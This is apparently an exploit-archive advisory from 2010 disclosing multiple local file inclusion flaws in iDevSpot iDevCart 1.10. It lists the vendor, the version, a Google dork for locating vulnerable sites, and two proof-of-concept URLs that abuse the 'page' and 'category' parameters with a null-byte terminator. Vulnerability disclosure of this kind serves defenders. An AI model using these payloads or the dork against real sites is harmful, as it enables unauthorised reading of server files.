[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities
# Published : 2010-12-24
# Author : v3n0m
# Previous Title : Vacation Rental Script v4.0 XSRF Vulnerability
# Next Title : Joomla Component (com_idoblog) SQL Injection Vulnerability
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
.WEB.ID
-----------------------------------------------------------------------
iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities
-----------------------------------------------------------------------
Author : v3n0m (v3n0m666[at]live[dot]com)
Site : http://yogyacarderlink.web.id/
Date : December, 24-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : iDevCart
Price : $49.95
Version : 1.10 Other versions may also be affected
Vendor : http://www.idevspot.com/
Google Dorks : "iDevCart 1.10 Shopping Cart Software"
Exploit & p0c
_____________
**[LFI]
http://127.0.0.1/[path]/index.php?page=[LFI]%00
http://127.0.0.1/[path]/index.php?page=browse&category=[LFI]%00
_________________________________________________
All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________